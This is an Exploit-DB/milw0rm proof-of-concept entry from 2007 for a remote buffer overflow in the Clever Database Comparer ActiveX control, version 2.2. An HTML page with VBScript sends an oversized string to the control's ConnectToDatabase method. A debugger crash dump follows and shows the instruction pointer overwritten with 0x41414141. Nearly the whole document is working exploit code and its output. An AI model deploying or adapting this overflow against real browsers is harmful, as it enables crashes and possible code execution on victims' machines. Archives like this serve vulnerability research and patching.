Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)

EDB-ID:

3921

Author:

shinnai

Type:

dos

Platform:

Windows

Published:

2007-05-14

<pre>
<span style="font: 14pt Courier New;"><p align="center"><b>2007/05/14</b></p></span>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-----------------------------------------------------------------------------
 <b>Clever Database Comparer ActiveX version 2.2 Remote Buffer Overflow Exploit</b>
 url: http://www.clevercomponents.com/home/news.asp
 price: from $49.99 to $149.19

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to these exploits.
-----------------------------------------------------------------------------
<object classid='clsid:24E0CD64-A8DE-4BE4-9706-4CFC89D212C9' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
<script language = 'vbscript'>
Sub tryMe
buff = String(2000,"A")
test.ConnectToDatabase buff,"default", "default", "default", "default"
End Sub
</script>

faultmon dump:
12:58:35.492  pid=0570 tid=07FC  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [41414141])
              ----------------------------------------------------------------
              EAX=01D04141: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
              EBX=41418282: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=01D0EA01: 41 41 41 41 41 41 41 41-41 41 41 41 41 41 41 41
              EDX=00000001: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ESP=01D0E510: 58 DD 0A 03 41 41 41 41-41 41 41 41 00 00 14 00
              EBP=01D0E540: E0 EA D0 01 28 6F 93 03-41 41 41 41 58 DD 0A 03
              ESI=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=030ADD58: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
              EIP=039316BC: 38 0E 74 1F 66 85 D2 6A-00 74 07 68 C8 32 95 03
                            --> CMP [ESI],CL
              ----------------------------------------------------------------

12:58:35.492  pid=0570 tid=07FC  EXCEPTION (first-chance)
              ----------------------------------------------------------------
              Exception C0000005 (ACCESS_VIOLATION reading [41414141])
              ----------------------------------------------------------------
              EAX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EBX=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              ECX=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDX=7C9137D8: 8B 4C 24 04 F7 41 04 06-00 00 00 B8 01 00 00 00
              ESP=01D0E140: BF 37 91 7C 28 E2 D0 01-28 EC D0 01 44 E2 D0 01
              EBP=01D0E160: 10 E2 D0 01 8B 37 91 7C-28 E2 D0 01 28 EC D0 01
              ESI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EDI=00000000: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
              EIP=41414141: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
                            --> N/A
              ----------------------------------------------------------------
</span></span>
</code></pre>

# milw0rm.com [2007-05-14]